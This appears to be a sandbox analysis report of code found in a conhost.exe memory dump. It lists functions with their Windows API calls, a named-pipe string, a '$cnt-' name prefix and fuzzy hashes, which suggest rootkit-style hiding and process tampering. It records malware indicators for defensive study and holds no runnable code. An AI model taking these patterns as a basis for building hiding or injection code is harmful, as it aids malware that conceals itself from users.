Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true

Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
Instruction ID: d937a312bc7b3bde9fea1102b2106fbccbd3f6392db440e88237d10bc8ced6b0
Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
Instruction Fuzzy Hash: 22418B33614B80DAE760CF21E94479EB7A1F389BD8F448129DA8957B58DF3DD889CB40

Function 00000166BE492518 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 44
filethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessIdOfThread.KERNEL32 ref: 00000166BE49252D
GetCurrentProcessId.KERNEL32 ref: 00000166BE492537
CreateFileW.KERNEL32 ref: 00000166BE492568
WriteFile.KERNEL32 ref: 00000166BE492590
ReadFile.KERNEL32 ref: 00000166BE4925AF
CloseHandle.KERNEL32 ref: 00000166BE4925B8

Strings

\\.\pipe\$cnt-childproc, xrefs: 00000166BE492549

Memory Dump Source

Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true

Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd

Similarity

API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
String ID: \\.\pipe\$cnt-childproc
API String ID: 166002920-175842701
Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
Instruction ID: 506efe6d6b9e80dd638bf699ff88a1647717e28096857f8f31de0f5d2fa38b4f
Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
Instruction Fuzzy Hash: 80114636718B40C2E7108B21FD5839A7760F789BE4F945325EA9982BA8DF3DC148CF40

Function 00000166BE497C50 Relevance: 12.2, APIs: 8, Instructions: 227
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00000166BE497C78
__scrt_acquire_startup_lock.LIBCMT ref: 00000166BE497CCA
_RTC_Initialize.LIBCMT ref: 00000166BE497CF8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00000166BE497D1E
__scrt_release_startup_lock.LIBCMT ref: 00000166BE497D49

Memory Dump Source

Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true

Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction ID: a73bc92d5c3928421890baee4e3c705afb83db72269209e8fa0cdfdb8cbe6f5d
Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction Fuzzy Hash: B681D639B00740CEFB54AB6A9E453ED6391AB857C4F944225EA09F77D7DB3BC8458700

Function 00000166BBF77050 Relevance: 12.2, APIs: 8, Instructions: 227COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00000166BBF77078
__scrt_acquire_startup_lock.LIBCMT ref: 00000166BBF770CA
_RTC_Initialize.LIBCMT ref: 00000166BBF770F8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00000166BBF7711E
__scrt_release_startup_lock.LIBCMT ref: 00000166BBF77149

Memory Dump Source

Source File: 00000016.00000003.1886349302.00000166BBF70000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000166BBF70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_3_166bbf70000_conhost.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction ID: fa12b446e92f011d855497a2b84f6d0c869c32bc38e8e96e8b41bfefb1cd84e2
Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction Fuzzy Hash: BF81D239B30241CAFE74AB279C413D9629DABC6780F1541A99E08C7796EFBBC855C700

Function 00000166BE499AAC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(?,?,?,00000166BE499C6B,?,?,?,00000166BE49945C,?,?,?,?,00000166BE498F65), ref: 00000166BE499B31
GetLastError.KERNEL32(?,?,?,00000166BE499C6B,?,?,?,00000166BE49945C,?,?,?,?,00000166BE498F65), ref: 00000166BE499B3F
LoadLibraryExW.KERNEL32(?,?,?,00000166BE499C6B,?,?,?,00000166BE49945C,?,?,?,?,00000166BE498F65), ref: 00000166BE499B69
FreeLibrary.KERNEL32(?,?,?,00000166BE499C6B,?,?,?,00000166BE49945C,?,?,?,?,00000166BE498F65), ref: 00000166BE499BD7
GetProcAddress.KERNEL32(?,?,?,00000166BE499C6B,?,?,?,00000166BE49945C,?,?,?,?,00000166BE498F65), ref: 00000166BE499BE3

Strings

api-ms-, xrefs: 00000166BE499B51

Memory Dump Source

Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true

Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
Instruction ID: 1e9911877a6e26ca072c93f2bbd287096faf56c8d1a45b2a67bdb5b1f599fccf
Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
Instruction Fuzzy Hash: 3B31AF35312A40DAEE119B06AE007E923E4BB48BE4F590635EE1DDB796EF3EC444C710

Function 00000166BE4A3400 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00000166BE4A3431
GetLastError.KERNEL32 ref: 00000166BE4A343D
CloseHandle.KERNEL32 ref: 00000166BE4A3455
CreateFileW.KERNEL32 ref: 00000166BE4A3480
WriteConsoleW.KERNEL32 ref: 00000166BE4A349F

Strings

CONOUT$, xrefs: 00000166BE4A3461

Memory Dump Source

Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true

Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
Instruction ID: b4189d2c00d3b4ac44951a0ad98a1955424120283a588704f76f63cf9c03904c
Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
Instruction Fuzzy Hash: 5F116A32714B40C6E7508B66EC5479DB6A0F798BF5F445224EA5EC7BA4DF7EC8048B40

Function 00000166BE496270 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00000166BE4962AB
GetThreadContext.KERNEL32 ref: 00000166BE496415

Part of subcall function 00000166BE4960A0: GetCurrentThreadId.KERNEL32 ref: 00000166BE4960A4

Memory Dump Source

Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true

Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
Instruction ID: 68bac6320a100f6cf9524770fd5d823ca44a1ed145f9566f2d5cafe5ff7032b2
Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
Instruction Fuzzy Hash: ABD19A7A608B88C5DA709B1AED9439E77A0F3C8BC8F500256EA8D977A5DF3DC551CB00

Function 00000166BE492098 Relevance: 9.1, APIs: 6, Instructions: 113threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00000166BE4920A6
TlsFree.KERNEL32 ref: 00000166BE49225F
TlsFree.KERNEL32 ref: 00000166BE49226B
TlsFree.KERNEL32 ref: 00000166BE492277
TlsFree.KERNEL32 ref: 00000166BE492283
TlsFree.KERNEL32 ref: 00000166BE49228F

Part of subcall function 00000166BE495E50: GetCurrentThreadId.KERNEL32 ref: 00000166BE495E66

Memory Dump Source

Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true

Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd

Similarity

API ID: Free$CurrentThread
String ID:
API String ID: 564911740-0
Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
Instruction ID: 2a06cfc6e5944a48507200ef20666fba28f2a905a7bb9fa51ce9760ab3085d3f
Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
Instruction Fuzzy Hash: EB51F539701B45D9EF05DF24EE913E833A1FB057C4F840825A52C963AAEF7AD929C354

Function 00000166BE4935C8 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,?,?,00000166BE4924D1), ref: 00000166BE4935EB
HeapAlloc.KERNEL32(?,?,?,?,?,00000166BE4924D1), ref: 00000166BE4935FE
StrCmpNIW.SHLWAPI(?,?,?,?,?,00000166BE4924D1), ref: 00000166BE493673
GetProcessHeap.KERNEL32(?,?,?,?,?,00000166BE4924D1), ref: 00000166BE4936D9
HeapFree.KERNEL32(?,?,?,?,?,00000166BE4924D1), ref: 00000166BE4936E7

Strings

$cnt-, xrefs: 00000166BE49366C

Memory Dump Source

Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true

Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: $cnt-
API String ID: 756756679-2536841369
Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
Instruction ID: 6e019a41d278c29ddd0080555b362a1ee6659d406dfdddf8911869c8b137c654
Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
Instruction Fuzzy Hash: B9318E36701B51DAEB21DF26EE407A963A1FBC5BD5F0840309F4997B56EF3AD8618700

Function 00000166BE49C940 Relevance: 9.1, APIs: 6, Instructions: 51COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00000166BE49C94F
SetLastError.KERNEL32 ref: 00000166BE49C96E
FlsSetValue.KERNEL32 ref: 00000166BE49C997
FlsSetValue.KERNEL32 ref: 00000166BE49C9A8
FlsSetValue.KERNEL32 ref: 00000166BE49C9B9

Part of subcall function 00000166BE49D2A0: HeapFree.KERNEL32(?,?,?,?,?,?,?,00000166BE49674A), ref: 00000166BE49D2B6
Part of subcall function 00000166BE49D2A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,00000166BE49674A), ref: 00000166BE49D2C0

SetLastError.KERNEL32 ref: 00000166BE49C9DC

Memory Dump Source

Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true

Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd

Similarity

API ID: ErrorLast$Value$FreeHeap
String ID:
API String ID: 365477584-0
Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
Instruction ID: 2e21d531b0a6f9a0e180fa11ca586c22c66354989c6ae7d2b2a953652679ffb0
Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
Instruction Fuzzy Hash: 64115E39701240CAFA1867716F553FF2252AB847E0F585624AD6AF63C7CE3ED4015700

Function 00000166BE491A30 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 00000166BE491A56
K32GetModuleFileNameExW.KERNEL32 ref: 00000166BE491A74
PathFindFileNameW.SHLWAPI ref: 00000166BE491A83
lstrlenW.KERNEL32 ref: 00000166BE491A8F
StrCpyW.SHLWAPI ref: 00000166BE491AA2
CloseHandle.KERNEL32 ref: 00000166BE491AB0

Memory Dump Source

Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true

Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
Instruction ID: 75985bdda7cf5660b0e08de1b699a682b4a271ef83656db5e7402c993114a372
Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
Instruction Fuzzy Hash: 76016935704B40C6EB10DB12AD5839AA3A1FB88FE0F884035DE9D87B54DE7EC985CB80

Function 00000166BE493E14 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,00000166BE493AAC), ref: 00000166BE493E30
GetCurrentProcess.KERNEL32(?,?,?,?,?,00000166BE493AAC), ref: 00000166BE493E3E
VirtualProtectEx.KERNEL32(?,?,?,?,?,00000166BE493AAC), ref: 00000166BE493E60
GetCurrentProcess.KERNEL32(?,?,?,?,?,00000166BE493AAC), ref: 00000166BE493E7E
VirtualProtectEx.KERNEL32(?,?,?,?,?,00000166BE493AAC), ref: 00000166BE493E9F
TerminateThread.KERNEL32(?,?,?,?,?,00000166BE493AAC), ref: 00000166BE493EAE

Memory Dump Source

Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true

Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
Instruction ID: 3982b69a75c74c18ee649c6c9da2a08a47cd84a0322c81104c86daa7ba99008e
Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
Instruction Fuzzy Hash: 8F012579715B40C6FB249B22ED4879A73B0BB99BD5F140428CA4D863A5EF3EC048CB40

Function 00000166BE491AD4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 00000166BE491AF4
StrCmpNIW.SHLWAPI ref: 00000166BE491B0E
lstrlenW.KERNEL32 ref: 00000166BE491B1D
StrCpyW.SHLWAPI ref: 00000166BE491B32

Strings

\\?\, xrefs: 00000166BE491B02

Memory Dump Source

Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true

Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
Instruction ID: 46b239f30bb04f292622cf27cccf0bcbdef9bed9ffee2ffb165e9e2b88e10d1d
Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
Instruction Fuzzy Hash: C9F06272304685D2EB209B21FEC43D9A361F784BE8FC45031DA4987A59DF7EC689CB00

Function 00000166BE493708 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI(?,?,00000000,00000166BE49275A), ref: 00000166BE49372A
StrCpyW.SHLWAPI ref: 00000166BE49373A
StrCatW.SHLWAPI ref: 00000166BE493746
PathCombineW.SHLWAPI(?,?,00000000,00000166BE49275A), ref: 00000166BE493754

Strings

\\.\pipe\, xrefs: 00000166BE493720

Memory Dump Source

Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true

Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
Instruction ID: 65d7fbcc7e9903a1c4eab5254f75e3833d621c0eb704783dc2350b09846fff45
Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
Instruction Fuzzy Hash: 18F0A074304B80C2FE449B13BE1419AA260FB88FD1F48A030EE0A97B29DF7DC4458B00

Function 00000166BE49B904 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00000166BE49B929
GetProcAddress.KERNEL32 ref: 00000166BE49B93F
FreeLibrary.KERNEL32 ref: 00000166BE49B95B

Strings

mscoree.dll, xrefs: 00000166BE49B920
CorExitProcess, xrefs: 00000166BE49B938

Memory Dump Source

Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true

Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
Instruction ID: 7e6000e13e1fb65474f988f3113df510af642b86e434f7991d411ce1221ec211
Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
Instruction Fuzzy Hash: 65F09A75365A01C5EA108B24AC843E96360EB897F0F982229DA6AC65E4CF7EC848CB00

Function 00000166BE495810 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00000166BE495896

Memory Dump Source

Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true

Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
Instruction ID: 13359bd2323b5128eb19eee7f104449875d5b0718491646c582b0fd3c54083a9
Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
Instruction Fuzzy Hash: A502E936619B84CAEB60CB55F99439AB7A0F3C47D4F200015EA8E97BA9DF7DC494CB10

Function 00000166BE492C80 Relevance: 7.6, APIs: 6, Instructions: 131COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 00000166BE492CAD
TlsGetValue.KERNEL32 ref: 00000166BE492CBC
TlsGetValue.KERNEL32 ref: 00000166BE492CCB
TlsSetValue.KERNEL32 ref: 00000166BE492E0F
TlsSetValue.KERNEL32 ref: 00000166BE492E1E
TlsSetValue.KERNEL32 ref: 00000166BE492E2D

Memory Dump Source

Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true

Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
